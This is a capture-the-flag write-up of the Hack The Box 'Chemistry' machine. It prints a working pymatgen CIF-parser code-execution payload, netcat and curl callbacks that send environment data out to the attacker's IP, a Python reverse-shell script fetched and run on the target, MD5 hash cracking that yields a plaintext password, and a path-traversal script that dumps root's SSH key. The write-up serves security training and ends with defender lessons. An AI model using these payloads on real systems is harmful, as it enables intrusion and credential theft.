Chemistry

INTRODUCTION

Chemistry was released as the penultimate box of HTB’s season 6, Heist. It’s about breaking into a custom service for analyzing a scientific data file. Maybe you’ve seen tools like this before, where some expert in a non-tech field knows just enough coding to solve a problem for themselves? It’s admirable that people do this type of thing, but these tools are often doomed by poor security - as we’ll see in this box.

Foothold is 99% of Chemistry. Unless you’re incredibly clever, it requires a little bit of research to discover a particular vulnerability disclosure, and utilize the PoC that the disclosure provides. The exploit from the PoC is quite limited, however, and will require careful usage to actually gain us a shell. Thankfully, if you build up to your foothold in a series of small steps, it should be relatively easy.

Unlike many “Easy” boxes, there is actually a small escalation from the service account that you use for foothold, to a low-privilege human user. Some very simple local enumeration will uncover a database, and inside are hashes that are trivial to crack - one of them leads to the next user.

Privilege escalation to root is… almost not even worth mentioning 😂 Just look through the filesystem for a suspicious script and run it.

title picture

RECON

nmap scans

Port scan

For this box, I’m running my typical enumeration strategy. I set up a directory for the box, with an nmap subdirectory. Then I set $RADDR to the target machine’s IP, and scanned it with a simple but broad port scan:

sudo nmap -p- -O --min-rate 1000 -oN nmap/port-scan-tcp.txt $RADDR
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

No web server, eh? That’s interesting!

Script scan

To investigate a little further, I ran a script scan over the TCP ports I just found:

TCPPORTS=`grep "^[0-9]\+/tcp" nmap/port-scan-tcp.txt | sed 's/^\([0-9]\+\)\/tcp.*/\1/g' | tr '\n' ',' | sed 's/,$//g'`
sudo nmap -sV -sC -n -Pn -p$TCPPORTS -oN nmap/script-scan-tcp.txt $RADDR
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_  256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.9.5
|     Date: Thu, 24 Oct 2024 04:38:29 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 719
|     Vary: Cookie
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Chemistry - Home</title>
|     <link rel="stylesheet" href="/static/styles.css">
|     </head>
|     <body>
|     <div class="container">
|     class="title">Chemistry CIF Analyzer</h1>
|     <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
|     <div class="buttons">
|     <center><a href="/login" class="btn">Login</a>
|     href="/register" class="btn">Register</a></center>
|     </div>
|     </div>
|     </body>
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
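The TCPPORTS one-liner from the script scan is dense, so here is a rough Python equivalent of what it does: pull the port numbers out of nmap's normal-format output and join them with commas. This is only a sketch. The function name and sample text are mine, and unlike the grep version it keeps only ports in the open state.

```python
import re


def open_tcp_ports(nmap_normal_output: str) -> str:
    """Return the open TCP ports from `nmap -oN` text as a comma-separated string."""
    ports = []
    for line in nmap_normal_output.splitlines():
        # Port lines look like "5000/tcp open  upnp"
        match = re.match(r"^(\d+)/tcp\s+open\b", line)
        if match:
            ports.append(match.group(1))
    return ",".join(ports)


# Sample text copied from the port scan results
sample = """PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
"""
print(open_tcp_ports(sample))  # → 22,5000
```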

Vuln scan

Now that we know what services might be running, I’ll do a vulnerability scan:

sudo nmap -n -Pn -p$TCPPORTS -oN nmap/vuln-scan-tcp.txt --script 'safe and vuln' $RADDR

No additional info from the vuln scan.

UDP scan

To be thorough, I also did a scan over the common UDP ports:

sudo nmap -sUV -T4 -F --version-intensity 0 -oN nmap/port-scan-udp.txt $RADDR

No results from the UDP scan.

Webserver Strategy

Nmap didn’t show any redirect for port 5000, but for convenience I’ll add an entry to /etc/hosts and do banner grabbing on that domain:

DOMAIN=chemistry.htb
echo "$RADDR $DOMAIN" | sudo tee -a /etc/hosts
whatweb --aggression 3 http://$DOMAIN:5000 && curl -IL http://$RADDR:5000

whatweb

That’s a slightly old version of Python, but a current version of Werkzeug.

Next I’ll perform vhost and subdomain enumeration. First, I’ll check for alternate hosts:

WLIST="/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt"
ffuf -w $WLIST -u http://$RADDR:5000/ -H "Host: FUZZ.htb" -c -t 60 -o fuzzing/vhost-root.md -of md -timeout 4 -ic -ac -v

None were found. But frankly, we weren’t expecting any against a Python + Werkzeug ( + Flask probably) webserver; they don’t usually define vhosts.

Next I’ll check for subdomains of chemistry.htb:

ffuf -w $WLIST -u http://$RADDR:5000/ -H "Host: FUZZ.$DOMAIN" -c -t 60 -o fuzzing/vhost-$DOMAIN.md -of md -timeout 4 -ic -ac -v

No new results from that. I’ll move on to directory enumeration on http://chemistry.htb:5000.

I prefer to not run a recursive scan, so that it doesn’t get hung up on enumerating CSS and images.

WLIST=/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
ffuf -w $WLIST:FUZZ -u http://$DOMAIN:5000/FUZZ -t 60 -ic -c -o fuzzing/ffuf-directories-root -of json -timeout 4

directory enum 1

Using ZAP to quickly spider the site, we achieve results that also indicate the POST parameters:

zap spider

Exploring the Website

The landing page is very simple, allowing us only to register or login. After a login, we should be redirected to the Dashboard.

index page

To try it out, I’ll register a user:

register and login

The Dashboard allows us to upload .CIF files. Thankfully, they provide an example file at /static/example.cif:

Dashboard

Downloading the example file, we can see that there’s basically no file metadata, just some stuff that probably gets parsed in Python. Notably, they’re serving it with an unusual Content-Type, chemical/x-cif:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.3 Python/3.9.5
Date: Thu, 24 Oct 2024 05:43:11 GMT
Content-Disposition: inline; filename=example.cif
Content-Type: chemical/x-cif
Content-Length: 376
Last-Modified: Wed, 09 Oct 2024 20:13:53 GMT
Cache-Control: no-cache
ETag: "1728504833.9929953-376-2511866491"
Date: Thu, 24 Oct 2024 05:43:11 GMT
Connection: close

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

After uploading the example.cif file, we can see an entry on the dashboard. It has uploaded to a file with a random filename, but the entry on the dashboard shows the filename we provided:

uploaded example

When we view the structure from example.cif that we just uploaded, we can see a couple of calculated values, volume and density. It’s probably a fair assumption that volume is simply a * b * c, but density looks more complicated:

viewing example

☝️ Regardless of how they’re calculated, what’s important is that we have calculated values that are being rendered based on user-controllable inputs.
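For what it's worth, the a * b * c guess is the special case of the general unit-cell volume formula when all three angles are 90 degrees. Here is a minimal sketch of that general formula, using the values from example.cif. I don't know how the app actually computes Volume; the function name is mine.

```python
import math


def cell_volume(a, b, c, alpha, beta, gamma):
    """Unit-cell volume from edge lengths and angles (angles in degrees)."""
    ca, cb, cg = (math.cos(math.radians(x)) for x in (alpha, beta, gamma))
    # General (triclinic) formula; the square root is 1 when every angle is 90
    return a * b * c * math.sqrt(1 - ca**2 - cb**2 - cg**2 + 2 * ca * cb * cg)


# Values from example.cif: a = b = c = 10, all angles 90 degrees
print(round(cell_volume(10, 10, 10, 90, 90, 90), 3))  # → 1000.0
```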

So far, I see a few things we might be able to attack:

  • The filename. We might be able to do a stored XSS via this parameter, but it’s unclear if that would gain us anything.
  • The calculated values Volume and Density: maybe we can find a way to sneak code into one of the user-controllable parameters, and gain RCE this way?

FOOTHOLD

Playing with the CIF File

At first, I tried to execute Python code written into the variables of the CIF file. I placed simple statements into all kinds of different positions of the CIF file, very similar to how you’d test for SSTI…

My only findings were that I could use arbitrary text for the elements in the _atom_site_occupancy data, and that portions of the string would be reflected onto the page. We can change the dimensions of the crystal, but can’t seem to inject commands into those values.

In hopes of traversing the imported modules within the server’s Python instance, I tried these payloads in various positions, too. If any of these were successful, we could build somewhat of a “gadget chain” in hopes of accessing something useful like os or subprocess:

  • [].__class__.__base__.__subclasses__()
  • ''.__class__.mro()[1].__subclasses__()
  • ''.__class__.__mro__[2].__subclasses__()
  • self.__init__.__globals__.__builtins__

No luck with any of those!

Vulnerability Research

🔍 Since my attempts at injecting code into the CIF file were unsuccessful, I started some web searching for known vulnerabilities in this file format. Eventually, I found this security advisory in the https://github.com/materialsproject/pymatgen Github repo, which documents a PoC for exploiting the parser for this file format:

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

The PoC executes a simple touch pwned command.
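To see how that long expression reaches the import machinery, here is a harmless sketch of its first two steps, run locally. It only locates the class the PoC filters for and does not call load_module or run any command. The helper name find_class is mine.

```python
# Step 1: any literal leads back to `object` through its method resolution order.
root = ().__class__.__mro__[1]
assert root is object

# Step 2: the PoC fetches __subclasses__ with __getattribute__ and a split string.
# This is the same lookup, written the same way.
list_subclasses = root.__getattribute__(root, "__sub" + "classes__")


def find_class(name):
    """Return the first direct subclass of object with this __name__, or None."""
    for cls in list_subclasses():
        if cls.__name__ == name:
            return cls
    return None


# The PoC picks out BuiltinImporter, then uses it to get hold of the os module.
importer = find_class("BuiltinImporter")
print(importer)
```

The point is that no import statement and no direct reference to os is needed: everything is reachable from an empty tuple.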

Testing the PoC

Clearly, this is a blind attack - there is no reflected info to the website. Therefore, to test if it works, I’ll use a payload that doesn’t rely on reflected values:

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("sleep 3");0,0,0'

I also did this with sleep 1, uploading two files.
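Since every test means uploading another .cif file with a different command, it helps to generate them. Below is a small sketch that drops a command into the PoC text from the advisory. The @@COMMAND@@ placeholder, the function name, and the rule that rejects quotes and newlines are my own conservative assumptions, not something the advisory specifies.

```python
# PoC text from the advisory, with the command swapped for a placeholder
CIF_TEMPLATE = """data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("@@COMMAND@@");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
"""


def build_cif(command: str) -> str:
    """Return the PoC CIF text with `command` placed inside the system() call."""
    # Quotes or newlines would break out of the quoted strings in the payload line
    if any(ch in command for ch in "\"'\n"):
        raise ValueError("command must not contain quotes or newlines")
    return CIF_TEMPLATE.replace("@@COMMAND@@", command)


# One file per delay, to compare response times
for delay in (1, 3):
    with open(f"sleep{delay}.cif", "w") as fh:
        fh.write(build_cif(f"sleep {delay}"))
```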

It seems like, when I View each of the files, the sleep command actually executes. Here are the two requests to view each file:

sleep poc

We can see that they take 0.19s plus whatever sleep delay was added!

Extend the PoC

Since this foothold will be blind, it might be useful to know whether or not cURL is on the target. To check, I’ll have the target call back to an HTTP server that I control.

I started up an instance of my typical HTTP server on port 8000. Check it out at my GitHub repo if you want to use it too. I’m using it here because it’ll automatically convert base64 data, and because it stays alive after more than one connection.

I’ve also opened up port 8000 using ufw. Here’s the payload:

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("curl http://10.10.14.17:8000/success");0,0,0'

curl is present

I was having a lot of trouble getting any subshells to work within the payload, so I checked what was available using which combined with nc:

which nc curl wget base64 sh bash ash python python3 | nc 10.10.14.17 53

revshell attempts which

Aha! So base64 and bash are not even on the target. That explains the failure of several of my attempts to exfiltrate any data…

Regardless, I’m not having any luck at all forming a reverse shell. Maybe I’ll try to learn more about the target, using this nc channel that has proven reliable.

Let’s do some basic enumeration:

id | nc 10.10.14.17 53
# uid=1001(app) gid=1001(app) groups=1001(app)

⚠️ Through a little bit of testing, I’m finding that it doesn’t work with subshells. Pipes seem to work perfectly fine though.

Alright, that makes sense. Let’s see if we can read env as a file:

nc 10.10.14.17 53 < /proc/self/environ
# LANG=en_US.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binHOME=/home/appLOGNAME=appUSER=appSHELL=/bin/bashINVOCATION_ID=24986dcd0cb74fbdbd9049da93c48384JOURNAL_STREAM=9:38060WERKZEUG_SERVER_FD=4
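The output runs together because Linux exposes a process's environment at /proc/<pid>/environ as NUL-separated KEY=value entries, and the terminal doesn't render the NUL bytes. If the raw bytes are saved on the attacker side, a few lines of Python split them back apart. This is a sketch: the function name is mine, and the sample is a shortened version of the capture with the separators put back.

```python
def parse_environ(raw: bytes) -> dict:
    """Split NUL-separated KEY=value entries into a dictionary."""
    env = {}
    for entry in raw.split(b"\x00"):
        if not entry:
            continue  # skip the empty chunk after the trailing NUL
        key, _, value = entry.partition(b"=")
        env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


# Shortened sample based on the capture above
sample = b"LANG=en_US.UTF-8\x00HOME=/home/app\x00USER=app\x00SHELL=/bin/bash\x00"
for key, value in parse_environ(sample).items():
    print(f"{key}={value}")
```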

Ohh interesting - this user has a home directory. Let’s list the contents:

ls -laR /home/app | nc 10.10.14.17 53

This produced a lot of results, but here are the notable parts:

home directory enum 0

home directory enum

home directory enum 2

USER FLAG

Planting an SSH Key

🚫 This didn’t actually work. I’m still not quite sure why. If you’re short on time, skip ahead to the next section.

Since we know the app user has a home directory, maybe we can simply plant an SSH key to get a shell? First, I’ll need to generate a keypair:

ssh-keygen -t rsa -b 4096 -f app_id_rsa -N "p3lican"
cp app_id_rsa.pub ../www  # Copy the pubkey over to the directory our http server is serving

Now let’s attempt to make an SSH directory and plant the pubkey. Here are the payloads:

mkdir /home/app/.ssh
curl http://10.10.14.17:8000/app_id_rsa.pub -o /home/app/.ssh/id_rsa.pub

I ran an extra payload to check that the pubkey landed where it should have (it did), so now we’re ready to connect over SSH:

ssh -i ./app_id_rsa app@$RADDR

ssh didnt work

Huh? Why isn’t it accepting key-based authentication? Is it explicitly disabled or something? The permissions on both files of the keypair are correct.

Oh well, may as well try something else… 😔
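One plausible explanation for the failure (untested on this box): by default, sshd checks an incoming key against ~/.ssh/authorized_keys, and never reads id_rsa.pub. The sketch below shows the layout sshd normally expects, demonstrated in a throwaway temp directory instead of a real home. The function name and the placeholder key string are mine.

```python
import os
import stat
import tempfile


def install_pubkey(home_dir: str, pubkey_line: str) -> str:
    """Append a public key to <home_dir>/.ssh/authorized_keys with strict permissions."""
    ssh_dir = os.path.join(home_dir, ".ssh")
    os.makedirs(ssh_dir, exist_ok=True)
    os.chmod(ssh_dir, 0o700)  # sshd usually rejects group/world-writable directories
    auth_keys = os.path.join(ssh_dir, "authorized_keys")
    with open(auth_keys, "a") as fh:
        fh.write(pubkey_line.strip() + "\n")
    os.chmod(auth_keys, 0o600)
    return auth_keys


# Harmless demo: a temporary directory stands in for /home/app
with tempfile.TemporaryDirectory() as fake_home:
    path = install_pubkey(fake_home, "ssh-rsa PLACEHOLDER_KEY_MATERIAL attacker@host")
    print(os.path.basename(path), oct(stat.S_IMODE(os.stat(path).st_mode)))
```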

Python Reverse Shell

Since we’ve already demonstrated we can write files using cURL, and that python3 is present on the target, why not simply download a python script and run it as a reverse shell?

My attempts to form a Python reverse shell didn’t work (using the payload from earlier). But those attempts were subject to whatever limitations the exploit had - and we already know that it didn’t accommodate subshells. Maybe we’ll have better luck running the reverse shell as a script?

First, I’ll prepare revshell.py in my www directory, the directory that my http server is serving:

#!/usr/bin/python3

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.17",53))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("sh")

Next I’ll start up a reverse shell listener:

sudo ufw allow from $RADDR to any port 53 proto tcp
bash
sudo su
rlwrap nc -lvnp 53

Now I’ll prepare another two .cif files - one with a payload to download the reverse shell, and another with a payload to run it:

curl http://10.10.14.17:8000/revshell.py -o /home/app/revshell.py
python3 /home/app/revshell.py

scripts for python revshell

Running both of those, we finally see a reverse shell open:

revshell open

database.db

Now that we have a stable reverse shell, and don’t need to worry about the limitations of the exploit, let’s exfil that database we found:

uploaded database

Now, from the attacker host, we can open it up and see what we’ve found:

SQLite version 3.46.0 2024-05-23 13:25:27
Enter ".help" for usage hints.
sqlite> .schema
CREATE TABLE structure (
        id INTEGER NOT NULL,
        user_id INTEGER NOT NULL,
        filename VARCHAR(150) NOT NULL,
        identifier VARCHAR(100) NOT NULL,
        PRIMARY KEY (id),
        FOREIGN KEY(user_id) REFERENCES user (id),
        UNIQUE (identifier)
);
CREATE TABLE user (
        id INTEGER NOT NULL,
        username VARCHAR(150) NOT NULL,
        password VARCHAR(150) NOT NULL,
        PRIMARY KEY (id),
        UNIQUE (username)
);

The user table looks like it has password hashes. I’ll put them in a nice format and extract them:

.mode csv
.separator :
select username,password from user;

user hashes

Lucky us - those look like MD5 hashes! They should be trivial to crack 👍

The list of users also contains rosa, who is the other user with a home directory on this box.
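The same username:password extraction can be scripted with Python's built-in sqlite3 module, which is handy if the sqlite3 CLI isn't installed. This is a sketch: the function name is mine, and the demo runs against an in-memory database with the same user table schema and a made-up row, not the real database.db.

```python
import sqlite3


def dump_user_hashes(conn):
    """Return 'username:password' lines from the user table."""
    rows = conn.execute("SELECT username, password FROM user")
    return [f"{username}:{password}" for username, password in rows]


# Stand-in database: same user table schema as above, fake data
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE user ("
    "id INTEGER NOT NULL, "
    "username VARCHAR(150) NOT NULL, "
    "password VARCHAR(150) NOT NULL, "
    "PRIMARY KEY (id), UNIQUE (username))"
)
conn.execute("INSERT INTO user (username, password) VALUES (?, ?)", ("demo", "0" * 32))

print("\n".join(dump_user_hashes(conn)))
```

Against the real file, the only change would be passing its path to sqlite3.connect().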

Password Cracking

I’ve copy-pasted those hashes (with the usernames) into database.hash. Under the assumption that they’re regular MD5 hashes, I’ll run hashcat over them:

hashcat -m 0 --username database.hash /usr/share/wordlists/rockyou.txt

Seconds later, we have several results - including rosa:

cracked hashes
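To show why unsalted MD5 falls so quickly, here is roughly what a dictionary attack boils down to: hash each candidate word once and look it up. This is a toy sketch with made-up data, not a replacement for hashcat. The function name and sample values are mine.

```python
import hashlib


def crack_md5(hashes, candidates):
    """hashes maps username -> hex MD5 digest; returns username -> recovered plaintext."""
    by_hash = {}
    for user, digest in hashes.items():
        by_hash.setdefault(digest.lower(), []).append(user)

    cracked = {}
    for word in candidates:
        digest = hashlib.md5(word.encode("utf-8")).hexdigest()
        # No salt, so one hash computation is checked against every user at once
        for user in by_hash.get(digest, []):
            cracked[user] = word
    return cracked


# Made-up example data
targets = {"demo_user": hashlib.md5(b"letmein").hexdigest()}
print(crack_md5(targets, ["password", "123456", "letmein"]))  # → {'demo_user': 'letmein'}
```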

The important credential is rosa : unicorniorosados. With any luck, this password will have been re-used for the local rosa account:

ssh rosa@$RADDR  # unicorniorosados

ssh as rosa

Excellent - we now have an SSH connection as rosa. The user flag is in /home/rosa, so go read it for some points:

cat /home/rosa/user.txt

ROOT FLAG

Local Enumeration - rosa

A quick check of netstat shows there is another listening process, listening locally on port 8080:

netstat

Cross-referencing this with ps aux, we can be reasonably sure that this is the process running from /opt/monitoring_site/app.py:

ps monitoring app

root is running the server, and only root can access that directory. Let’s forward the port and check it out.

Since I already have an SSH connection, the easiest way to forward the port is simply using ssh -L:

ssh -L 8080:localhost:8080 rosa@$RADDR

Now we should be able to access that port on localhost:

monitoring_site

Monitoring Site

🚫 This section didn’t lead towards privilege escalation. If you’re short on time, skip to the next section.

Checking out the site

The monitoring site looks like it was made quite hastily, possibly hinting that this is something we should attack? The Start Service, Stop Service, and Check Attacks buttons in the navbar seem like they’re unimplemented - clicking any of them shows a message that the feature is not available.

The graphs on the Home page are completely static, so the only functionality that is actually implemented here is under List Services. Here’s the javascript connected to that button:

$('#list-services').click(function() {
    $('.container > div').hide();
    $('#service-list').show();
    $('#attack-logs').hide();

    // Get list of services
    $('.loader').show();
    $.get('/list_services', function(data) {
        $('.loader').hide();
        var runningServices = [];
        var stoppedServices = [];

        // Separate running and stopped services
        // ...
        
        // Show running services
        // ...

        // Show stopped services
        // ...
    });
});

In short, it makes a GET request to /list_services, then parses the results. Here’s what that endpoint looks like:

list_services

That’s interesting, but I don’t really see anything out of the ordinary.

Enumerating the API

Since there are unimplemented features in the frontend, there’s a possibility that the developer created the backend first and just hasn’t got around to finishing the frontend. We already know about GET /list_services; are there more?

Thankfully, Seclists has a good wordlist for enumerating APIs:

WLIST=/usr/share/seclists/Discovery/Web-Content/api/api-endpoints-res.txt
ffuf -w $WLIST:FUZZ -u http://localhost:8080/FUZZ -t 60 -ic -c -timeout 4 -mc all -fc 404

API enum get

ffuf -w $WLIST:FUZZ -u http://localhost:8080/FUZZ -X POST -t 60 -ic -c -timeout 4 -mc all -fc 404

API enum post

There weren’t any significant results. If I get stuck, I might return to enumerating the API more - for now, I’ll move on to something else.

Continuing local enumeration

As I was downloading my toolbox into /tmp (to get a copy of pspy), I noticed something very odd sitting there:

found prewritten exploit

The contents of expl.sh:

#!/bin/bash

url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/.ssh/id_rsa" # without the first /

for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"
    
    if [[ $status_code -eq 200 ]]; then
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done

😏 Rosa… what have you been up to?

The above script is a pre-written exploit for the monitoring_site server. It applies a very simple path traversal to obtain the id_rsa key for root.
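The loop in expl.sh just builds deeper and deeper ../ chains until one escapes the assets directory. Here is a sketch of the URL-building part only, with no requests sent. The function name is mine, and the defaults mirror the script's variables. Note that curl's --path-as-is flag is what keeps the ../ sequences from being collapsed before the request goes out.

```python
def traversal_urls(base_url, prefix, target, max_depth=15):
    """Yield candidate URLs with 1..max_depth '../' segments after the prefix."""
    payload = prefix
    for _ in range(max_depth):
        payload += "../"
        yield f"{base_url}{payload}{target}"


urls = list(traversal_urls("http://localhost:8080", "/assets/", "root/.ssh/id_rsa"))
print(urls[0])    # → http://localhost:8080/assets/../root/.ssh/id_rsa
print(len(urls))  # → 15
```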

So what are we waiting for? Let’s run it!

prewritten exploit success

😂 Yep, that’s right - rosa has been doing their own privesc work. Lucky us, eh? The script works flawlessly and dumps the SSH private key for root.

All we need to do is paste it into a file and fix the permissions on it:

vim loot/root_id_rsa  # [paste the key]
chmod 600 loot/root_id_rsa
ssh -i loot/root_id_rsa root@$RADDR

root  ssh

cat /root/root.txt

Wow - privesc was ridiculously easy!

CLEANUP

Target

I’ll get rid of the spot where I place my tools, /tmp/.Tools:

rm -rf /tmp/.Tools

Attacker

There’s also a little cleanup to do on my local / attacker machine. It’s a good idea to get rid of any “loot” and source code I collected that didn’t end up being useful, just to save disk space:

rm loot/database.db

It’s also good policy to get rid of any extraneous firewall rules I may have defined. This one-liner just deletes all the ufw rules:

NUM_RULES=$(($(sudo ufw status numbered | wc -l)-5)); for (( i=0; i<$NUM_RULES; i++ )); do sudo ufw --force delete 1; done; sudo ufw status numbered;

LESSONS LEARNED

two crossed swords

Attacker

  • 🗺️ Don’t get too fixated on a certain route to RCE. On this box, I feel like I wasted a lot of time during foothold trying to test and understand the limitations of the CIF file exploit. If I could go back and do it again, I would have adjusted my approach as soon as I found a single working command like nc.

  • 👣 Related to the above point, break your ideas up into small, testable steps. In the end, it will save a lot of time because you won’t be checking and re-checking your assumptions over and over. Form a hypothesis, figure out a way to test it, prove it to yourself, then add it to your big bag of knowledge and keep moving forward.

two crossed swords

Defender

  • 💉 Beware niche libraries that might not practice secure coding. I’m sure the creators of the .CIF file interaction libraries were exceptionally good scientists, but nobody is an expert in everything… They followed very sloppy coding practices, using an eval() call to parse user-controllable inputs, leading to our ability to inject commands. The lesson here is mostly to monitor the health of open-source projects: for maximum security, a project needs active contributions from people with a wide variety of skillsets.

  • #️⃣ Hash passwords properly. Give some consideration to password hashing. In the end, the best password hashing balances the ease of legitimate password verification and difficulty of illicit password cracking. This box used unsalted MD5 for hashing passwords, which is laughably easy to crack (you can even just toss them into Crackstation.net). Better modern approaches would have been using bcrypt (with sufficient difficulty), or using PBKDF2 with HMAC-SHA-512 (also with sufficient difficulty). Check out the guidelines by OWASP for more info.

  • Permissions are only as useful as the most permissive thing a service has access to. On this box, we escalated privilege by using a very simple path traversal - so why was the monitoring_site able to access root’s SSH key? This server should have been run as a service account, with limited permissions. Heck, even rosa had sufficient permissions to list the running services (service --status-all), so why was it granted root?
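On the path traversal itself: I never saw the monitoring_site source, so this is not a patch for it, just a minimal sketch of the usual containment check a file-serving handler can apply before opening anything. The function name and the /srv/assets directory are hypothetical.

```python
import os


def resolve_inside(base_dir: str, requested: str) -> str:
    """Resolve `requested` under `base_dir`, refusing anything that escapes it."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # After resolving '..' and symlinks, the result must still sit under base
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"refusing path outside {base}: {requested!r}")
    return candidate


# A normal asset resolves fine...
print(resolve_inside("/srv/assets", "css/site.css"))

# ...but the traversal used on this box is rejected.
try:
    resolve_inside("/srv/assets", "../../root/.ssh/id_rsa")
except PermissionError as err:
    print("blocked:", err)
```

Even with a check like this, running the service as an unprivileged account is what limits the damage when the check is missing or wrong.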


Thanks for reading

🤝🤝🤝🤝
@4wayhandshake